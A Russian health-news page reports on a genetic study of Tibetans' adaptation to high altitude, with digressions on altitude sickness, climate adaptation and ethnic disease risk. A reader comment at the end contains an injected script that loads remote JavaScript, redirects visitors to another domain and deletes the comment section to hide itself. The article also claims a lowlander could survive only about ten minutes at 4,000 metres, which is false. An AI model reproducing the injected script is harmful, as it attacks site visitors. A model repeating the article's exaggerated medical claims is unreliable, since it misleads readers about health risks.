Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  О, сколько нам открытий ч...  >>  О, сколько нам открытий чудных …
 
Обратная связь
 

О, сколько нам открытий чудных …

Размер шрифта
21 июля 2010 03:20
  • google_analytics: false
  • Нравится

Достижения в области генетики помогут в лечении высотной болезни.

Антонина Камышенкова / «Здоровье-инфо»

К такому выводу пришли американские исследователи из Школы медицины Университета штата Юта под руководством профессора Линна Жорде и их партнеры по данной работе – генетики из медицинской школы Цинхайского университета в Китае. Ученые исследовали ДНК 31 представителя народа, населяющего высокогорный Тибет. Именно у горных жителей Тибета они обнаружили 10 специфических генов, помогающих этим людям выживать и прекрасно себя чувствовать на высоте 4 тысячи метров над уровнем моря, которая другим народностям грозила бы самыми тяжелыми формами высотной болезни. То есть любой равнинный житель смог бы находиться в высокогорной Тибетской деревушке не более 10 минут, после чего его следовало бы срочно транспортировать вниз в состоянии острого кислородного голодания. .

Секрет выносливости тибетцев ученые объяснили тем, что два из десяти обнаруженных генов, а именно EGLN1 и PPARA, связаны с гемоглобином – веществом в крови, которое «отвечает» в организме человека за доставку кислорода. По мнению исследователей, генетически обусловленное пониженное содержание гемоглобина в крови обеспечивает более эффективное усвоение кислорода по сравнению с равнинными жителями, что и помогает тибетцам спокойно переносить его недостаток в горном разреженном воздухе.

Профессор Жорде и его группа планируют продолжить работу. Им предстоит выяснить точный механизм, посредством которого данные варианты генов регулируют уровень кислорода. Профессор объясняет, что гены несут ответственность лишь за часть горной выносливости и что, если у обычного человека просто понизить гемоглобин, это никак не сделает его более приспособленным к горам. Поэтому ученые продолжают поиски гена, ответственного за такую эффективную доставку кислорода в ткани. Исследователи надеются, что их работа поможет найти способы лечения высотной болезни, включая самые тяжелые ее формы.

От чего же застрахованы жители Тибета?

Высотная болезнь или, как ее по-свойски называют альпинисты – «горняшка» – патологическое состояние, возникающее из-за острого кислородного голодания при подъеме на большую высоту. У человека учащается дыхание, «темнеет в глазах», возникает головная боль и тошнота, учащается артериальное давление. В тяжелых случаях – нарушается координация движения, возникают временные психические нарушения, выражающиеся в эйфории и некритическом отношении к реальности. Возможны также обморок и даже летальный исход.

Все это объясняется тем, что на определенной высоте организм начинает компенсировать недостаток кислорода усилением деятельности сердечно-сосудистой и дыхательной систем, но этих усилий хватает ненадолго – при подъеме на еще большую высоту начинается декомпенсация сердечной деятельности, которая при отсутствии мер по спасению человека может закончиться остановкой сердца. Страшна высотная болезнь и своими последствиями – в некоторых случаях возможны отек головного мозга, постгипоксическая энцефалопатия с необратимыми поражениями коры больших его полушарий, а также постгипоксическиие расстройства зрения, психики, памяти и т.д.

Учитывая такую серьезность этого заболевания, тем более становится интересным открытие американских и китайских ученых, которое, возможно, в самом ближайшем будущем даст возможность всем желающим подниматься в горы, не опасаясь упасть без сознания на покоренной вершине. Ведь именно такого рода «иммунитет» и приобрели тибетцы и, например, жители Анд, у которых он выражен иначе – в повышенном содержании гемоглобина. Только эти народы приобрели защиту в результате естественного отбора в течение многих веков, а мы можем получить его с помощью новейших медицинских технологий.

Расовые признаки – результат изменения генов

Вообще, исследование приспособленности человеческого организма к географическим условиям среды обитания – это предмет изучения целой науки под названием геногеография, которую основал в 20-х годах XX века академик Серебровский.

Специалисты не исключают, что именно адаптация к условиям обитания обуславливает, например, расовые различия между популяциями – ведь на сегодняшний момент считается, что все наши предки имеют африканское происхождение. По предположениям ученых одна или несколько групп человеческой популяции около 90 тысяч лет назад покинули Африканский континент и вышли в Азию через Аравийский полуостров, и лишь потом, адаптируясь к климату и другим внешним условиям, приобрели те внешние черты, которые и отличают сегодня одну расу от другой. Например, цвет кожи является результатом адаптации человека к ультрафиолетовому излучению. Темная кожа осталась у жителей южных широт, а вот светлая кожа считается эволюционно более поздним признаком, возникшим из-за изменений в генах, регулирующих выработку меланина. Пропорции человеческого тела тоже связаны с климатом. Короткие ноги у жителей Арктики и Крайнего Севера увеличивают отношение массы тела к площади его поверхности и тем самым сберегают теплоотдачу, а вот «сухие» тела и пропорционально длинные ноги и руки у представителей африканских племен, напротив, помогают им отдавать как можно больше тепла.

Можно также привести пример различных типов строения лица в зависимости от климата. Так, широкие и плоские носы характерны для жителей стран с влажным субтропическим климатом. Если же климат сухой и холодный, то чем длиннее нос, тем лучше он будет согревать и увлажнять вдыхаемый воздух.

Питание как фактор адаптации

Адаптация человека к среде обитания проявилась и в генетических изменениях, связанных с типом питания. И этот вопрос, так же как и связь стиля питания и здоровья популяций изучает сравнительно молодая наука этногеномика.

Самая распространенная из приспособленностей к типу питания – это полученная в течение тысячелетий переносимость молочного сахара вместо его непереносимости, которая была запрограммирована у всех популяций, и выражалась в том, что фермент лактаза для переработки молочного сахара вырабатывался только у детенышей, а у взрослых особей отсутствовал. Но вот у европейцев в наше время лактаза вырабатывается в течение всей жизни, что связано с мутацией гена, регулирующего синтез этого фермента. Это произошло тысячелетия назад, и, по-видимому, было связано с началом развития молочного скотоводства.

Жители тундры отличаются генетическим отсутствием фермента трегалазы, расщепляющего углеводы грибов. И это понятно, ведь местные жители не едят грибов, они здесь – пища оленей.

Из-за мутаций гена, определяющего количество ферментов печени, расщепляющих алкоголь, народы Восточной Азии и северные народы быстро пьянеют при приеме алкоголя и могут получить сильнейшую интоксикацию от одной рюмки спиртного.

Генетические заболевания

Как мы уже поняли, географическая среда обитания способствовала изменению многих генов, облегчая существование человека в данных условиях, приспосабливая его организм к определенным продуктам питания, а также спасая его от многих болезней. Но точно так же в генах зашифрованы и подверженность некоторым заболеваниям, которые могут проявляться во многих поколениях, и болезням – таких по подсчетам ученых несколько тысяч. Почему так происходит? Как эти заболевания связаны со средой проживания и с продуктами питания? Все эти вопросы, как мы уже говорили, также изучает этногеномика. И сфера изучения настолько широка, что видимых пределов для работы ученых здесь нет. Хотя в некоторых странах им и удалось обследовать население полностью (Ирландия), пока у ученых есть больше вопросов, чем ответов.

Почему белые американцы менее подвержены артериальной гипертензии, чем их соотечественники с темным цветом кожи? Почему афроамериканец скорее отравится никотином, выкуривая столько же сигарет, сколько американец азиатского происхождения, который при этом будет прекрасно себя чувствовать? Почему 35% мужского населения Финляндии страдает гипертонией? Почему только в странах Средиземноморья встречается особый вид малокровия, а в Ирландии чаще, чем в других странах встречается целиакия – заболевание непереносимости злаковых? Почему коренные народы Сибири меньше подвержены инфекциям, а ненцы, живущие в тундре, более устойчивы к радиации?

На эти и другие вопросы ученые надеются найти ответ, изучая генетику разных народов.

Впереди великие открытия, способные показать нам путь к излечению самых серьезных заболеваний.

 

 

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.